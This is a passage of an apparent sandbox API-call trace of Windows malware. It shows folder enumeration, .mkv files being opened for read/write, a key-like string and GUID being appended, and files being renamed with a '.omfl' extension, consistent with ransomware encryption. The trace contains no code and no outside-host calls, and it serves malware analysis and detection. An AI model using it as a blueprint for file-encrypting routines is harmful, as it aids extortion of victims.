lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.797] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdce69c8 [0131.797] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.797] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.797] WriteFile (in: hFile=0x610, lpBuffer=0xdce69c8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdce69c8*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.797] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.797] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.797] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.797] CloseHandle (hObject=0x610) returned 1 [0131.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2758 [0131.799] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0x74fb288 [0131.799] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2758 | out: hHeap=0x4970000) returned 1 [0131.799] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XzRFEhHHp D7j.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xzrfehhhp d7j.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XzRFEhHHp D7j.mkv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xzrfehhhp d7j.mkv.omfl")) returned 1 [0131.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.800] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.800] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0131.802] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29b48340, ftCreationTime.dwHighDateTime=0x1d5e1af, ftLastAccessTime.dwLowDateTime=0xcaef2aa0, ftLastAccessTime.dwHighDateTime=0x1d5e6ad, ftLastWriteTime.dwLowDateTime=0xcaef2aa0, ftLastWriteTime.dwHighDateTime=0x1d5e6ad, nFileSizeHigh=0x0, nFileSizeLow=0x15918, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XzRFEhHHp D7j.mkv", cAlternateFileName="XZRFEH~1.MKV")) returned 0 [0131.802] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c010 | out: hHeap=0x4970000) returned 1 [0131.802] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c900 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e90 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c118 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757bca0 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757ba90 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5ef8 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5670 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5ae8 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c748 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5c88 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db9a8 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf59b0 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dba00 | out: hHeap=0x4970000) returned 1 [0131.802] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dba58 | out: hHeap=0x4970000) returned 1 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5948 | out: hHeap=0x4970000) returned 1 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dbab0 | out: hHeap=0x4970000) returned 1 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5a18 | out: hHeap=0x4970000) returned 1 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dbb08 | out: hHeap=0x4970000) returned 1 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dbb60 | out: hHeap=0x4970000) returned 1 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c4e0 | out: hHeap=0x4970000) returned 1 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd06f38 | out: hHeap=0x4970000) returned 1 [0131.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0131.803] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.803] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.803] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0xdd29950 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.804] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0131.804] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.804] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0131.804] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.805] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0xdd29950 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.805] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0131.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.806] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0131.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0131.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0131.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0131.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd35238 [0131.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0131.806] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.806] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.806] PathFindFileNameW (pszPath="") returned="" [0131.806] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2758 [0131.806] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0131.807] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.807] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0131.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2758 [0131.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0131.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2b90 [0131.807] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0131.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x38) returned 0xdce37f0 [0131.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2758 [0131.807] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0131.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2b90 [0131.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x54) returned 0xdd08cc8 [0131.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0xdd2e718 [0131.807] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.807] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0131.807] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0131.808] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0131.808] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0131.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0131.808] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0131.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2b90 [0131.808] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0131.808] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.808] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\") returned="_BvYf_mP_z7pO60\\" [0131.808] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0131.808] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0131.808] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0131.808] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0131.808] PathFindFileNameW (pszPath="") returned="" [0131.808] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8881ea90, ftCreationTime.dwHighDateTime=0x1d5e4a5, ftLastAccessTime.dwLowDateTime=0x8b935c20, ftLastAccessTime.dwHighDateTime=0x1d5e07a, ftLastWriteTime.dwLowDateTime=0x8b935c20, ftLastWriteTime.dwHighDateTime=0x1d5e07a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0131.809] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8881ea90, ftCreationTime.dwHighDateTime=0x1d5e4a5, ftLastAccessTime.dwLowDateTime=0x8b935c20, ftLastAccessTime.dwHighDateTime=0x1d5e07a, ftLastWriteTime.dwLowDateTime=0x8b935c20, ftLastWriteTime.dwHighDateTime=0x1d5e07a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.809] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb063820, ftCreationTime.dwHighDateTime=0x1d5d9e1, ftLastAccessTime.dwLowDateTime=0xd9b2ca20, ftLastAccessTime.dwHighDateTime=0x1d5da8b, ftLastWriteTime.dwLowDateTime=0xd9b2ca20, ftLastWriteTime.dwHighDateTime=0x1d5da8b, nFileSizeHigh=0x0, nFileSizeLow=0x13778, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FR5HPFQiDoOluSF.mkv", cAlternateFileName="FR5HPF~1.MKV")) returned 1 [0131.809] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\FR5HPFQiDoOluSF.mkv") returned=".mkv" [0131.809] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\FR5HPFQiDoOluSF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bvyf_mp_z7po60\\fr5hpfqidoolusf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0131.809] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=79736) returned 1 [0131.809] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.813] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x13752, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.814] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, 